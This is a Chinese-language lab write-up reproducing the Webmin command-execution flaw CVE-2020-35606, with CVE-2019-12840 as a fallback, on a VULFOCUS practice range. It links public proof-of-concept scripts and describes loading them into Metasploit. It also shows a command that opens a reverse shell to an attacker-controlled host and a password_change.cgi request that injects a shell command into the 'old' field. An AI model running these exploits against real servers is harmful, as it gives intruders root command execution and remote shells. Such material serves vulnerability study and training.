CVE-2020-35606

admin 2022年5月20日02:48:08评论102 views字数 1019阅读3分23秒阅读模式

Webmin命令执行

介绍

Webmin是功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。Webmin支持绝大多数的Unix系统,这些系统除了各种版本的linux以外还包括:AIX、HPUX、Solaris、Unixware、Irix和FreeBSD等。

漏洞原理

Webmin 1.962版本及之前版本存在安全漏洞,该漏洞允许执行任意命令。任何被授权使用Package Updates模块的用户都可以使用root权限执行任意命令。

影响版本

Webmin 1.962版本及其之前的版本。

漏洞复现

采用VULFOCUS在线靶场进行漏洞复现。


CVE-2020-35606


打开靶场所给地址。

出现错误,在url添加https://即可。


CVE-2020-35606

CVE-2020-35606


webmin的默认密码是root/password(靶场已给出),登陆成功,webmin版本为1.962。(末班车)


CVE-2020-35606


此漏洞可通过脚本来探测是否存在(脚本需在MSF内使用)

https://github.com/puckiestyle/CVE-2020-35606


CVE-2020-35606

脚本导入MSF

此处我使用的kali内置的msf,存放目录

/usr/share/metasploit-framework/modules/

使用reload_all命令导入。


CVE-2020-35606


use 4


CVE-2020-35606


配置完成后,check进行漏洞探测,漏洞存在。


CVE-2020-35606


在进行攻击利用的时候,记得填入webmin的账号和密码(上图)。

Run结果—G~。


CVE-2020-35606

后来在网上搜罗了大半天,终于找到希望的脚本,CVE-2019-12840。


https://github.com/KrE80r/webmin_cve-2019-12840_poc


更改121行的端口(默认端口是10000)


CVE-2020-35606


CVE-2019-12840使用命令

python2 CVE-2019-12840.py -u https://targetip(一定不要加端口) -U username -P password -lhost VPSIP -lport nc监听端口


CVE-2020-35606


反弹成功,拿到flag。


CVE-2020-35606

CVE-2020-35606


第二种方法—直接手撸,访问password_change.cgi

https://123.58.236.76:58682/password_change.cgi


CVE-2020-35606

user=rootxx&pam=&expired=2&old=ls /tmp&new1=test2&new2=test2

CVE-2020-35606


原文始发于微信公众号(三零二):CVE-2020-35606

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月20日02:48:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2020-35606http://cn-sec.com/archives/1024465.html

发表评论

匿名网友 填写信息